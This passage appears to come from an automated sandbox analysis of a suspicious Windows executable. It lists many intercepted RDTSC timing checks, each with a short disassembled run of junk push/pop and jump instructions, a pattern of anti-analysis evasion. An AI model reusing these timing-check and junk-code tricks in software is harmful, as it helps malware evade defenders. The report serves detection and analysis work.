              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E89 second address: 706E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7066DA second address: 7066ED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC714E98426h 0x00000008 ja 00007FC714E98426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7066ED second address: 7066F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7066F3 second address: 7066F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7066F9 second address: 706702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706702 second address: 706708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706708 second address: 70670C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70670C second address: 706731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC714E98426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jnc 00007FC714E98434h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7069A8 second address: 7069B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A004 second address: 70A022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E98434h 0x00000009 jc 00007FC714E98426h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A022 second address: 70A026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A026 second address: 70A035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC714E98426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7099B0 second address: 7099BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC714E8FEE6h 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7099BE second address: 7099D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC714E98426h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FC714E98426h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C9D second address: 709CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709CA1 second address: 709CDD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FC714E98432h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FC714E98437h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F61C second address: 70F62D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007FC714E8FEE6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F8F5 second address: 70F92E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FC714E98426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FC714E98428h 0x00000012 pushad 0x00000013 jmp 00007FC714E98439h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F92E second address: 70F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FEB4 second address: 70FEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FEBA second address: 70FEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FEC3 second address: 70FECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC714E98426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71021B second address: 710221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71106D second address: 711073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711073 second address: 711078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711078 second address: 71107D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71107D second address: 711083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716ABC second address: 716AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716AC4 second address: 716AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC714E8FEF1h 0x00000018 jo 00007FC714E8FEE6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716AEE second address: 716AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719D6B second address: 719D7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719D7A second address: 719D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F2A second address: 719F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E8FEEAh 0x00000009 jnp 00007FC714E8FEE6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F3E second address: 719F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F42 second address: 719F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007FC714E8FEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F62 second address: 719F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A292 second address: 71A2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FC714E8FEE6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A2A8 second address: 71A2AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A2AD second address: 71A2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A40E second address: 71A413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A57B second address: 71A597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC714E8FEF0h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A597 second address: 71A59B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A6E8 second address: 71A6FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7235BA second address: 7235C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721C30 second address: 721C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721DB1 second address: 721DB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721DB7 second address: 721DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220A2 second address: 7220A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72223E second address: 722242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722242 second address: 72224D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72224D second address: 722253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722253 second address: 722280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98432h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC714E98432h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7223EB second address: 722426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FC714E8FEE6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC714E8FEF9h 0x00000013 jmp 00007FC714E8FEF3h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722426 second address: 72242B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72242B second address: 722431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722431 second address: 72243E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC714E98426h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72243E second address: 722448 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E8FEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722448 second address: 72245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop eax 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72245A second address: 722463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7225AC second address: 7225C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E98435h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722C5D second address: 722C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722C61 second address: 722CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC714E9842Ch 0x0000000b pushad 0x0000000c jmp 00007FC714E98430h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FC714E98439h 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CA7 second address: 722CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CAD second address: 722CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CB8 second address: 722CBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298A4 second address: 7298AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC714E98426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298AE second address: 7298BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298BC second address: 7298D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98437h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298D7 second address: 7298DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735210 second address: 735227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC714E9842Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735227 second address: 73522B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F43 second address: 734F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73749C second address: 7374A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D2FB second address: 73D301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74CF1F second address: 74CF24 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74CF24 second address: 74CF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB62 second address: 66AB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB66 second address: 66AB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB6A second address: 66AB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC714E8FEEAh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75530D second address: 755313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 755313 second address: 75532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC714E8FEEAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75532A second address: 75532E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75578C second address: 7557A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FC714E8FEEFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7558EA second address: 7558EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7558EE second address: 75590C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7592A5 second address: 7592B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FC714E98426h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660A0 second address: 7660D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007FC714E8FEE6h 0x00000010 jmp 00007FC714E8FEF4h 0x00000015 popad 0x00000016 jng 00007FC714E8FEEAh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660D8 second address: 7660DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660DC second address: 7660E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660E0 second address: 7660E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6659BE second address: 6659CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC714E8FEE6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6659CC second address: 6659D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F96 second address: 790F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790195 second address: 790199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790199 second address: 7901A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7901A7 second address: 7901AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790C6E second address: 790C91 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC714E8FEE6h 0x00000008 jmp 00007FC714E8FEF9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79263D second address: 792658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC714E98433h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795123 second address: 795127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79539A second address: 7953A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7953A3 second address: 7953A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795740 second address: 795744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795744 second address: 795748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
